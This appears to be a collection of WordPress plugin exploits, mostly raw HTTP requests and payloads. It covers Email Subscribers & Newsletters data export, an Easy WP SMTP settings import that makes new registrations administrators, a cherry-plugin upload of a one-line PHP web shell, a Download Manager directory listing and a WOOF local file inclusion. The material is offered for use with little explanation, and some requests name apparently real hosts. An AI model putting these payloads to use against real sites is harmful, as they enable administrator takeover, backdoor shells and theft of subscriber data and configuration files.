Random Wordpress Exploits May or May Not Work.
Description: Unauthenticated File Download w/ Information Disclosure
CVE ID: CVE-2019-19985
CVSS v3.0 Score: 5.8 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3
GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=es_subscribers&action=export
Connection: close
Content-Length: 2
Easy WP SMTP Plugin for WordPress 1.3.9 RCE/Add Admin
The popular Easy WP SMTP plugin, which as 300,000+ active installations, was prone to a critical zero-day vulnerability that allowed an unauthenticated user to modify WordPress options or to inject and execute code among other malicious actions.
In the following proof of concept, Its going to use swpsmtp_import_settings to upload a file that will contain a malicious serialized payload that will enable users registration (users_can_register) and set the user default role (default_role) to “administrator” in the database.
1. Create a file name “/tmp/upload.txt” and add this content to it:
> a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}
2. Upload the file:
>$ curl https://TARGET.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'
The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
POST /wp-content/plugins/cherry-plugin/admin/import-export/upload.php HTTP/1.1 Host: lovi.studio Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 Content-Length: 522 Content-Type: multipart/form-data; boundary=db6aa92af633763a3f43abd6cde64077 --db6aa92af633763a3f43abd6cde64077 Content-Disposition: form-data; name="file"; filename="shell.php" <?=`$_GET[0]`?>
WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
POST /?es=export HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
option=view_all_subscribers
POST /wp-admin/admin.php?task=wpdm_dir_tree HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.134/wp-admin/post-new.php?post_type=wpdmpro
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 33
Origin: http://192.168.1.134
Connection: close
dir=%2Fvar%2Fwww/html/wp-content/
TITLE Arbitrary Shortcode Execution & Local File Inclusion PRODUCT WOOF - WooCommerce Products Filter (PluginUs.Net) VULNERABLE VERSION 1.1.9 FIXED VERSION 2.2.0
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress.lan
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 75
action=woof_redraw_woof&shortcode=woof_search_options&pagepath=/etc/hosts